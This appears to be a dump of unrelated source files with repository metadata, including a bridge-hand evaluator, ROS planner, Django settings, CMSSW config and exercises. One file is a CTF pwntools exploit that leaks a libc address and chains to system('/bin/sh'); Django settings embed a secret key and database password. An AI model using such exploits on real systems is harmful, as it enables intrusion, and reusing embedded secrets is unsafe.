    TestHand("S:K642 H:Q985 D:AT64 C:4", 0, 1, 0, 9, 2, 11, 7),
    TestHand("S:KQ3 H:Q76 D:J43 C:J987", 0, 0, 0, 9, 0, 9, 9),
    TestHand("S:A64 H:72 D:KJ8542 C:AJ", 2, 0, 0, 13, 2, 15, 7),
    TestHand("S:AT4 H:86 D:A984 C:AKT7", 1, 0, 0, 15, 1, 16, 7),
    TestHand("S:J972 H:9 D:98742 C:T54", 0, 1, 0, 1, 2, 3, 10),
    TestHand("S:9854 H:K43 D:Q5 C:9873", 1, 0, 0, 5, 1, 6, 10),
    TestHand("S:KT943 H:T63 D:JT5 C:97", 1, 0, 0, 4, 1, 5, 10),
    TestHand("S:T9732 H:J86 D:K93 C:86", 1, 0, 0, 4, 1, 5, 10),
    TestHand("S:KT8 H:94 D:AJT4 C:6532", 1, 0, 0, 8, 1, 9, 9),
    TestHand("S:AQT92 H:J763 D:763 C:6", 0, 1, 0, 7, 2, 9, 8),
    TestHand("S:AK94 H:K743 D:AKT C:72", 1, 0, 0, 17, 1, 18, 6),
    TestHand("S:A974 D:AK94 C:QJ932", 0, 0, 1, 14, 3, 17, 5),
    TestHand("S:J873 H:KJ62 D:A96 C:K8", 1, 0, 0, 12, 1, 13, 8),
    TestHand("S:T732 H:T2 D:JT8 C:AK96", 1, 0, 0, 8, 1, 9, 9),
    TestHand("S:KT H:AK975 D:QJT2 C:KJ", 2, 0, 0, 17, 2, 19, 5),
    TestHand("S:KJT97 H:AQ843 D:86 C:5", 1, 1, 0, 10, 3, 13, 6)
]
class BridgeHand:
    """One 13-card bridge hand with standard hand-evaluation metrics.

    All metrics are computed on demand by re-parsing the canonical string
    form produced by __str__ (e.g. "S:AK3 H:T987 D:KJ98 C:QJ").
    """
    def __init__(self, cards: typing.Sequence[Card]):
        """
        Process and store the sequence of Card objects passed in input.
        Raise TypeError if not a sequence
        Raise ValueError if any element of the sequence is not an instance
        of Card, or if the number of elements is not 13
        """
        if not isinstance(cards, Sequence):
            raise TypeError("BridgeHand object must be initiated with card sequence")
        elif len(cards) != 13:
            raise ValueError("Card sequence must have 13 cards")
        elif not all(isinstance(x, Card) for x in cards):
            raise ValueError("Card sequence can have only card objects")
        else:
            self.cards = cards

    def __str__(self) -> str:
        """
        Return a string representing this hand, in the following format:
        "S:AK3 H:T987 D:KJ98 C:QJ"
        List the suits in SHDC order, and the cards within each suit in
        AKQJT..2 order.
        Separate the suit symbol from its cards with a colon, and
        the suits with a single space.
        Note that a "10" should be represented with a capital 'T'
        """
        ret = ''
        # Group rank names by suit name; void suits simply never appear.
        ret_dict = defaultdict(list)
        for c in self.cards:
            ret_dict[str(c.suit.name)].append(str(c.rank.name))
        # Sort suits SHDC and ranks AKQJT..2 via their enum declaration order.
        for s in sorted(ret_dict, key=lambda x: Suit[x].value):
            ret += "{}:{} ".format(s, ''.join(sorted(ret_dict[s], key=lambda x: Rank[x].value)))
        return "{}".format(ret.strip())

    @property
    def hcp(self) -> int:
        """ Return the number of high card points contained in this hand """
        # Milton Work count: A=4, K=3, Q=2, J=1; other ranks score nothing.
        hcp = 0
        for suit_holding in self.__str__().split():
            # suit_holding looks like "S:AK3"; chars after ':' are the ranks.
            for c in suit_holding.strip().split(':')[1]:
                if c == 'A':
                    hcp += 4
                if c == 'K':
                    hcp += 3
                if c == 'Q':
                    hcp += 2
                if c == 'J':
                    hcp += 1
        return hcp

    @property
    def doubletons(self) -> int:
        """ Return the number of doubletons (exactly two cards in a suit) """
        doubletons = 0
        for suit_holding in self.__str__().split():
            if len(suit_holding.strip().split(':')[1]) == 2:
                doubletons += 1
        return doubletons

    @property
    def singletons(self) -> int:
        """ Return the number of singletons (exactly one card in a suit) """
        singletons = 0
        for suit_holding in self.__str__().split():
            if len(suit_holding.strip().split(':')[1]) == 1:
                singletons += 1
        return singletons

    @property
    def voids(self) -> int:
        """ Return the number of voids (missing suits) contained in
        this hand
        """
        # __str__ omits empty suits, so voids = 4 minus the suits present.
        non_voids = 0
        for suit_holding in self.__str__().split():
            non_voids += 1
        return 4 - non_voids

    @property
    def ssp(self) -> int:
        """ Return the number of short suit points in this hand.
        Doubletons are worth one point, singletons two points,
        voids 3 points
        """
        # NOTE(review): duplicates the module-level SSP table instead of
        # using it — keep the two in sync if the scoring ever changes.
        return self.doubletons * 1 + self.singletons * 2 + self.voids * 3

    @property
    def total_points(self) -> int:
        """ Return the total points (hcp and ssp) contained in this hand """
        return self.hcp + self.ssp

    @property
    def ltc(self) -> int:
        """ Return the losing trick count for this hand - see bite description
        for the procedure
        """
        # Only the top three cards of each suit can be losers; a card is a
        # winner if it is one of A/K/Q high enough for the suit's length.
        ltc = 0
        for suit_holding in self.__str__().split():
            # singletons: only the ace is not a loser
            if len(suit_holding.strip().split(':')[1]) == 1:
                for c in suit_holding.strip().split(':')[1]:
                    if c == 'A':
                        ltc += 0
                    else:
                        ltc += 1
            # doubletons: AK = 0 losers, Ax/Kx = 1, anything else = 2
            if len(suit_holding.strip().split(':')[1]) == 2:
                d_cards = suit_holding.strip().split(':')[1]
                if d_cards == 'AK':
                    ltc += 0
                elif d_cards[0] == 'A' or d_cards[0] == 'K':
                    ltc += 1
                elif d_cards[0] == 'Q':
                    ltc += 2
                else:
                    ltc += 2
            # 3+ card suits: judge only the top three cards (ranks are sorted)
            if len(suit_holding.strip().split(':')[1]) >= 3:
                t_cards = suit_holding.strip().split(':')[1][:3]
                if t_cards == 'AKQ':
                    ltc += 0
                elif t_cards[:2] == 'AK' or t_cards[:2] == 'AQ' or t_cards[:2] == 'KQ':
                    ltc += 1
                elif t_cards[0] == 'A' or t_cards[0] == 'K' or t_cards[0] == 'Q':
                    ltc += 2
                else:
                    ltc += 3
        return ltc
| [
"nhegde@netflix.com"
] | nhegde@netflix.com |
f60397de642e3f12a66fcdec6cae5c94fd5de495 | 7185ae54efb2ce9ecd4bd9c53057053f6e799ae3 | /PWN/some/2019年7月17日-pwn-(水+ok+cpp)/pwn02/pwn2exp.py | 24a3645e72b65dccd0dcc3936b7502a14b8fcc14 | [] | no_license | 0xFF1E071F/CTFchallenge | 1b259c3f7cf8f7a1c20ea38cadd8f170bff137d1 | 12bb31a202b6110c05758fc4d57cfb58c98d9f23 | refs/heads/master | 2022-04-07T03:34:46.241887 | 2020-03-02T00:22:37 | 2020-03-02T00:22:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | from pwn import *
context.log_level = 'debug'
p = process("./pwn02")
e = ELF("./pwn02")
# First interaction with the target's prompts; the two values below are the
# exploit's chosen inputs (the large number is presumably a base address /
# counter value — TODO confirm against the binary's logic).
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
# ROP gadget addresses and a writable scratch address in the binary.
pop_ret = 0x0804898b
ppp_ret = 0x08048989
addr = 0x0804A058
# Stage 1: 32 bytes of padding, then read(0, addr, 4) via the PLT, cleaning
# up three args with ppp_ret, and return into 0x080486FD afterwards.
payload = '1234' * 8
payload += p32(e.plt['read']) + p32(ppp_ret) + p32(0) + p32(addr) + p32(
    4) + p32(0x080486FD)
p.recvuntil("ASLR\n")
p.sendline(payload)
# Send the GOT entry of putchar so the program leaks its runtime address.
p.sendline(p32(e.got['putchar']))
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
p.recvuntil('\x0a')
# Stage 2: compute libc base from the leaked putchar address, then derive
# system() and the "/bin/sh" string (offsets are specific to the target libc).
libc_base = u32(p.recv(4)) - 0x60da0
libc_system = libc_base + 0x3a940
libc_binsh = libc_base + 0x15902b
# Overflow again: system("/bin/sh") with pop_ret as its fake return address.
payload = '1234' * 8
payload += p32(libc_system) + p32(pop_ret) + p32(libc_binsh)
p.sendline(payload)
p.interactive()
| [
"mozhaohua1999@outlook.com"
] | mozhaohua1999@outlook.com |
fd1fcb904335972d230abf0e0b9f8fa1588452ca | 695c1667d2b2b57ccb526cc2817bbe5c4038de5c | /navigator/src/plan.py | 24dac9a6c5d361b969b4178a7bd74b3b55573e2d | [] | no_license | Avinash-1501/cse550 | a6f18e2f84fd47595af994aa81b95fc20e9a311e | 36037193af4c7ac2af282471a66c064af3c6a0f4 | refs/heads/master | 2021-05-29T06:40:56.356026 | 2015-04-29T19:26:18 | 2015-04-29T19:26:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | #!/usr/bin/python
import roslib; roslib.load_manifest('navigator')
from assignment05.path_planning import *
from navigator import *
# Parse Args
parser = argparse.ArgumentParser(description='Path Plan')
parser.add_argument('mapbag')
args = parser.parse_args(rospy.myargv()[1:])
# Get Data From Bag Files
the_map = get_dict( args.mapbag )['/map']
rospy.init_node('path_plan')
mpub = rospy.Publisher('/map', OccupancyGrid, latch=True)
mpub.publish(the_map)
ppub = rospy.Publisher('/start_pose', PoseStamped, latch=True)
path_pub = rospy.Publisher('/path', Path)
start_pose = None
goal_pose = None
def plan():
if start_pose is None or goal_pose is None:
return
result = to_grid2(start_pose[0],start_pose[1], the_map)
if not result:
print "INVALID START POSE"
return
else:
sx, sy = result
result = to_grid2(goal_pose[0],goal_pose[1], the_map)
if not result:
print "INVALID GOAL POSE"
return
else:
gx, gy = result
X = plan_path(sx, sy, gx, gy, the_map)
if X:
path_pub.publish(to_path(X, the_map))
else:
print "NO PATH"
def goal_sub(msg):
global goal_pose
goal_pose = to_tuple(msg.pose.position, msg.pose.orientation)
plan()
def start_sub(msg):
global start_pose
start_pose = to_tuple(msg.pose.pose.position, msg.pose.pose.orientation)
ps = PoseStamped()
ps.header = msg.header
ps.pose = apply(to_pose, start_pose)
ppub.publish(ps)
plan()
sub = rospy.Subscriber('/goal_pose', PoseStamped, goal_sub)
sub2 = rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, start_sub)
rospy.spin()
| [
"davidvlu@gmail.com"
] | davidvlu@gmail.com |
b59d20addda1b62a145dcbfe767a7c76a7c061be | ad4c2aa0398406ccb7e70562560e75fa283ffa1a | /sum-of-left-leaves/sum-of-left-leaves.py | e9eb62561a866708b2384dbdd88bb0c50858d9ac | [
"Apache-2.0"
] | permissive | kmgowda/kmg-leetcode-python | 427d58f1750735618dfd51936d33240df5ba9ace | 4d32e110ac33563a8bde3fd3200d5804db354d95 | refs/heads/main | 2023-08-22T06:59:43.141131 | 2021-10-16T14:04:32 | 2021-10-16T14:04:32 | 417,841,590 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | // https://leetcode.com/problems/sum-of-left-leaves
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sumOfLeftLeaves(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.total = 0
def sumLeftleaf(root, isleft):
if root:
if not root.left and not root.right:
if isleft:
self.total+=root.val
sumLeftleaf(root.left, True)
sumLeftleaf(root.right, False)
sumLeftleaf(root, False)
return self.total | [
"keshava.gowda@gmail.com"
] | keshava.gowda@gmail.com |
1105ec0b1ddb15924ebfc28ab85fa00d3efaa6f1 | 6baab869e16ed7cafdea7e0e68f27b7e0fc1c2ee | /demo_class/demo_5.py | 7feb701538b28b26283d5f7e1471c99811bbe084 | [] | no_license | SkewwG/Python_demo | ad4bd81207619bff23498b41833bc45695eab164 | 9357645287cc49d3396bd65062b71ac646076979 | refs/heads/master | 2021-05-03T05:21:56.685496 | 2018-07-06T00:02:59 | 2018-07-06T00:02:59 | 120,637,210 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | def demo_yield(n):
print('cunting')
while n > 0:
print('before')
yield n
n -= 1
print('afeter')
print(demo_yield(5).__next__()) | [
"446106525@qq.com"
] | 446106525@qq.com |
43fa50129b5df8f91bad45446acac3e2c063f1d9 | ef6229d281edecbea3faad37830cb1d452d03e5b | /ucsmsdk/mometa/extpol/ExtpolControllerCont.py | ae30d6ff188351082a4f0e1dd925a6370910ef71 | [
"Apache-2.0"
] | permissive | anoop1984/python_sdk | 0809be78de32350acc40701d6207631322851010 | c4a226bad5e10ad233eda62bc8f6d66a5a82b651 | refs/heads/master | 2020-12-31T00:18:57.415950 | 2016-04-26T17:39:38 | 2016-04-26T17:39:38 | 57,148,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | """This module contains the general information for ExtpolControllerCont ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class ExtpolControllerContConsts():
pass
class ExtpolControllerCont(ManagedObject):
"""This is ExtpolControllerCont class."""
consts = ExtpolControllerContConsts()
naming_props = set([])
mo_meta = MoMeta("ExtpolControllerCont", "extpolControllerCont", "controllers", VersionMeta.Version211a, "InputOutput", 0x1f, [], ["admin"], [u'extpolRegistry'], [u'extpolController'], ["Get"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"gen_num": MoPropertyMeta("gen_num", "genNum", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x8, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x10, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"genNum": "gen_num",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.gen_num = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "ExtpolControllerCont", parent_mo_or_dn, **kwargs)
| [
"test@cisco.com"
] | test@cisco.com |
d0a35e213f17e748c12586e0e2841ee69e1ff8ad | 43e3f2169a88daedf915fae594412b993f1a4ec2 | /execptions.py | 8a46a0c01b3874e86f28bb0391dff54b5168297e | [] | no_license | Wanted-Preonboarding-Backend-1st-G5/Assignment5 | 756037cbe94eb245f743898487fb48d2f0ab44e6 | 967220f04da4ec84d370c59ef9636fae3e3fbb56 | refs/heads/main | 2023-09-02T08:49:57.839875 | 2021-11-18T00:03:00 | 2021-11-18T00:03:00 | 428,106,477 | 0 | 5 | null | 2021-11-16T17:19:44 | 2021-11-15T03:09:21 | Python | UTF-8 | Python | false | false | 104 | py | class FileExtensionNotMatchError(Exception):
def __init__(self, msg):
super().__init__(msg)
| [
"embedded61@gmail.com"
] | embedded61@gmail.com |
5c2f4032248c9ab25d6bf54b79381af856bb74b5 | 759c447b4cc7105096983eadb87d667ae472d6c0 | /acme_diags/plot/colormaps/rewrite_from_colorcet.py | fa6946bff0a7c3ea3f15a0ac5cbcc5d39bfc6ac5 | [
"BSD-3-Clause"
] | permissive | kaabre/acme_diags | cd41014ee0f023eb8796c1ac414615be0fe99f53 | 40364724ce46f1e5ec91201764da1de593a1a5f0 | refs/heads/master | 2021-05-14T17:32:19.577633 | 2018-02-09T20:29:49 | 2018-02-09T20:29:49 | 116,049,920 | 0 | 0 | null | 2018-01-02T19:34:12 | 2018-01-02T19:34:12 | null | UTF-8 | Python | false | false | 763 | py | try:
import colorcet
except BaseException:
print "Cannot convert from colorcet w/o colorcet"
import sys
sys.exit()
all_cms = colorcet.cm
def dump_cmap(name, mpl_cmap):
nm = "cet_%s" % name
with open("%s.rgb" % nm, "w") as f:
f.write("# Converted from colorcet\n")
f.write("#\n")
f.write("# number of colors in table\n")
f.write("#ncolors = %i\n" % mpl_cmap.N)
f.write("#\n")
f.write("# r g b\n")
for i in range(mpl_cmap.N):
a = float(i) / float(mpl_cmap.N - 1)
r, g, b, a = [int(x * 255) for x in mpl_cmap(a)]
f.write(" %3s %3s %3s\n" % (r, g, b))
print "Wrote %s" % nm
for cmap in all_cms.keys():
dump_cmap(cmap, all_cms[cmap])
| [
"doutriaux1@llnl.gov"
] | doutriaux1@llnl.gov |
d74f5f77d2d099686d4658eabd6ee585ea46da9f | 4ad0dddd7a6e29b31d5780bf6dec6ebad776cf73 | /SimG4CMS/HGCalTestBeam/test/HGCalTBCERN170_cfg.py | d30e37913859424152ef656058b1ddaa63fd7e67 | [
"Apache-2.0"
] | permissive | llechner/cmssw | 95dcd6ae0ced5546853778c6ebdf0dd224030215 | 419d33be023f9f2a4c56ef4b851552d2d228600a | refs/heads/master | 2020-08-26T20:20:28.940065 | 2018-10-18T09:24:51 | 2018-10-18T09:24:51 | 131,112,577 | 0 | 0 | Apache-2.0 | 2019-10-23T17:59:17 | 2018-04-26T06:51:19 | C++ | UTF-8 | Python | false | false | 4,988 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process('SIM')
# import of standard configurations
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTB170JulyXML_cfi')
process.load('Geometry.HGCalCommonData.hgcalNumberingInitialization_cfi')
process.load('Geometry.HGCalCommonData.hgcalParametersInitialization_cfi')
process.load('Configuration.StandardSequences.MagneticField_0T_cff')
process.load('Configuration.StandardSequences.Generator_cff')
process.load('IOMC.EventVertexGenerators.VtxSmearedFlat_cfi')
process.load('GeneratorInterface.Core.genFilterSummary_cff')
process.load('Configuration.StandardSequences.SimIdeal_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBCheckGunPosition_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBAnalyzer_cfi')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('HGCSim')
process.MessageLogger.categories.append('HcalSim')
# Input source
process.source = cms.Source("EmptySource")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('SingleMuonE200_cfi nevts:10'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.RAWSIMoutput = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('generation_step')
),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('GEN-SIM'),
filterName = cms.untracked.string('')
),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
fileName = cms.untracked.string('file:gensim.root'),
outputCommands = process.RAWSIMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('TBGenSim.root')
)
# Other statements
process.genstepfilter.triggerConditions=cms.vstring("generation_step")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
process.generator = cms.EDProducer("FlatRandomEThetaGunProducer",
AddAntiParticle = cms.bool(False),
PGunParameters = cms.PSet(
MinE = cms.double(99.99),
MaxE = cms.double(100.01),
MinTheta = cms.double(0.0),
MaxTheta = cms.double(0.0),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
PartID = cms.vint32(13)
),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1),
psethack = cms.string('single muon E 100')
)
process.VtxSmeared.MinZ = -800.0
process.VtxSmeared.MaxZ = -800.0
process.VtxSmeared.MinX = -7.5
process.VtxSmeared.MaxX = 7.5
process.VtxSmeared.MinY = -7.5
process.VtxSmeared.MaxY = 7.5
process.g4SimHits.HGCSD.RejectMouseBite = True
process.g4SimHits.HGCSD.RotatedWafer = True
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
HGCPassive = cms.PSet(
LVNames = cms.vstring('HGCalEE','HGCalHE','HGCalAH', 'CMSE'),
MotherName = cms.string('CMSE'),
),
type = cms.string('HGCPassive'),
)
)
process.HGCalTBAnalyzer.DoDigis = False
process.HGCalTBAnalyzer.DoRecHits = False
process.HGCalTBAnalyzer.UseFH = True
process.HGCalTBAnalyzer.UseBH = True
process.HGCalTBAnalyzer.UseBeam = True
process.HGCalTBAnalyzer.ZFrontEE = 1110.0
process.HGCalTBAnalyzer.ZFrontFH = 1172.3
process.HGCalTBAnalyzer.DoPassive = True
# Path and EndPath definitions
process.generation_step = cms.Path(process.pgen)
process.gunfilter_step = cms.Path(process.HGCalTBCheckGunPostion)
process.simulation_step = cms.Path(process.psim)
process.genfiltersummary_step = cms.EndPath(process.genFilterSummary)
process.analysis_step = cms.Path(process.HGCalTBAnalyzer)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.generation_step,
process.genfiltersummary_step,
process.simulation_step,
process.gunfilter_step,
process.analysis_step,
process.endjob_step,
process.RAWSIMoutput_step,
)
# filter all path with the production filter sequence
for path in process.paths:
getattr(process,path)._seq = process.generator * getattr(process,path)._seq
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
258ba757b7cd1250e8a2e1abe6391c275e180530 | 719fb168fdace7548c719a6d998b71bb15525d6c | /src/kinya/settings.py | baffe196271147d4a3a1787b16e0169cf7139ce7 | [] | no_license | nicpottier/kinya | 858b19f9d8891c4be80d8ecce477fbfd5c747a8e | e3f9ee774fcb00f916911df986f61e8f8a78f188 | refs/heads/master | 2016-09-05T21:18:03.141403 | 2011-05-23T18:19:20 | 2011-05-23T18:19:20 | 783,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,117 | py | # Django settings for kinya project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Nicolas Pottier', 'nicp@nyaruka.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'kinya',
'USER': 'kinya', # Not used with sqlite3.
'PASSWORD': 'murakoze', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../static')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 's7=@35q5k6wzfmrhn7=1l27s$z&0k&dawsuu65q2)i*^tb3rkvasdf'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'kinya.urls'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../templates')
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'kinya.lessons',
)
| [
"nicpottier@gmail.com"
] | nicpottier@gmail.com |
453465980126de4e0addd9466aa1fb4eb7709d95 | 452b8b849e080cda5a26f4018cafa5a674ff7c20 | /froide/account/migrations/0003_auto_20160125_2127.py | 284973b0045128333fd564ec7053b4d1ea74536a | [
"MIT"
] | permissive | okffi/tietopyynto | 1262dcaf748c41b49be4a774be552fc75fc9b336 | 66b7e7dbf3c3395d79af3da85b3b58f01fad62dc | refs/heads/tietopyynto | 2021-01-17T21:07:04.829856 | 2016-10-30T19:26:53 | 2016-10-30T19:26:53 | 14,255,294 | 3 | 2 | MIT | 2021-01-05T11:51:18 | 2013-11-09T10:19:16 | Python | UTF-8 | Python | false | false | 688 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0002_auto_20150729_0828'),
]
operations = [
migrations.AddField(
model_name='user',
name='date_left',
field=models.DateTimeField(default=None, null=True, verbose_name='date left', blank=True),
),
migrations.AddField(
model_name='user',
name='is_deleted',
field=models.BooleanField(default=False, help_text='Designates whether this user was deleted.', verbose_name='deleted'),
),
]
| [
"mail@stefanwehrmeyer.com"
] | mail@stefanwehrmeyer.com |
6f40c592f87d09d6a2d046b25fabd3e80395a695 | 118984fdbacf5eb71159eb511ccd055987498886 | /CH11/EX11.38.py | a2c179da5ac2a5a4bd3de019820e3260ddb8588a | [] | no_license | 6igsm0ke/Introduction-to-Programming-Using-Python-Liang-1st-edtion | 321c6256be6ff78adbc8e3ddc73f2f43a51a75ab | 159489f3af296f87469ddddf3a1cb232917506b0 | refs/heads/master | 2023-06-05T20:03:17.951911 | 2021-06-18T18:04:42 | 2021-06-18T18:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | # 11.38 (Turtle: draw a polygon/polyline) Write the following functions that draw a
# polygon/polyline to connect all points in the list. Each element in the list is a list of
# two coordinates.
# # Draw a polyline to connect all the points in the list
# def drawPolyline(points):
# # Draw a polygon to connect all the points in the list and
# # close the polygon by connecting the first point with the last point
# def drawPolygon(points):
# # Fill a polygon by connecting all the points in the list
# def fillPolygon(points):
import turtle
# Draw a polyline to connect all the points in the list
def drawPolyline(points):
for i in range(len(points) - 1):
drawLine(points[i], points[i + 1])
# Draw a polygon to connect all the points in the list and
# close the polygon by connecting the first point with the last point
def drawPolygon(points):
drawPolyline(points)
drawLine(points[len(points) - 1], points[0]) # Close the polygon
# Fill a polygon by connecting all the points in the list
def fillPolygon(points):
turtle.begin_fill()
drawPolygon(points)
turtle.end_fill()
# Draw a line from (x1, y1) to (x2, y2)
def drawLine(x1, y1, x2, y2):
turtle.penup()
turtle.goto(x1, y1)
turtle.pendown()
turtle.goto(x2, y2)
points = input("Enter points: ").split()
points = [eval(p) for p in points]
drawPolygon(points) | [
"47993441+OmarAlmighty@users.noreply.github.com"
] | 47993441+OmarAlmighty@users.noreply.github.com |
10662b2839c963e9c42342a502361677ede604d6 | 104a0ec7cfb5d4bf948f22b47edb59122a886363 | /input/kinetics/families/intra_substitutionCS_cyclization/depository.py | d3a115a1158e51d03bfd7a044c1ccccb5d030255 | [] | no_license | nickvandewiele/RMG-database | 3afbe88df46a5641c6abbaf032bf4a0b6b9aae73 | dc3cbc7048501d730062426a65d87ea452e8705f | refs/heads/master | 2020-12-25T08:19:49.436773 | 2014-08-04T21:37:26 | 2014-08-04T21:37:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | #!/usr/bin/env python
# encoding: utf-8
name = "intra_substitutionCS_cyclization/depository"
shortDesc = u""
longDesc = u"""
"""
| [
"jwallen@mit.edu"
] | jwallen@mit.edu |
4b18e558dc27eafa6c869c000bf0f0e6270df667 | 19d47d47c9614dddcf2f8d744d883a90ade0ce82 | /pynsxt/swagger_client/models/lb_source_ip_persistence_profile.py | 3b76026eb4c6d08312a91366ab687f7d0bcdcb0c | [] | no_license | darshanhuang1/pynsxt-1 | 9ed7c0da9b3a64e837a26cbbd8b228e811cee823 | fb1091dff1af7f8b8f01aec715682dea60765eb8 | refs/heads/master | 2020-05-25T14:51:09.932853 | 2018-05-16T12:43:48 | 2018-05-16T12:43:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,200 | py | # coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.lb_persistence_profile import LbPersistenceProfile # noqa: F401,E501
from swagger_client.models.resource_link import ResourceLink # noqa: F401,E501
from swagger_client.models.self_resource_link import SelfResourceLink # noqa: F401,E501
from swagger_client.models.tag import Tag # noqa: F401,E501
